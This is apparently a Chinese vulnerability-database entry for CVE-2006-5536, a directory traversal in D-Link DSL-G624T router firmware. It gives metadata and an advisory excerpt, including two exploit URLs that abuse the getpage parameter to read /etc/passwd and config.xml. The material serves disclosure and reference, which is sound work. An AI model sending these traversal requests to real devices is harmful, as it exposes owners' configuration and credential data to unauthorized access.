D-Link DSL-G624T firmware 'cgi-bin/webcm'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111355 漏洞类型 路径遍历
发布时间 2006-10-23 更新时间 2007-05-03
CVE编号 CVE-2006-5536 CNNVD-ID CNNVD-200610-448
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28847
https://www.securityfocus.com/bid/20689
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-448
|漏洞详情
D-LinkDSL-G624Tfirmware3.00B01T01.YA-C.20060616的cgi-bin/webcm中存在目录遍历漏洞,远程攻击者可以通过getpage参数中的..(点点)读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/20689/info

D-Link DSL-G624T devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.

http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml
|受影响的产品
D-Link DSL-G624T V3.00B01T01.YA-C.200 D-Link DSL-G624T 0
|参考资料

来源:BID
名称:20689
链接:http://www.securityfocus.com/bid/20689
来源:BUGTRAQ
名称:20061023D-LinkDSL-G624Tseveralvulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/449486/100/0/threaded
来源:VUPEN
名称:ADV-2006-4191
链接:http://www.frsirt.com/english/advisories/2006/4191
来源:MISC
链接:http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html
来源:SECUNIA
名称:22524
链接:http://secunia.com/advisories/22524
来源:SREASON
名称:1781
链接:http://securityreason.com/securityalert/1781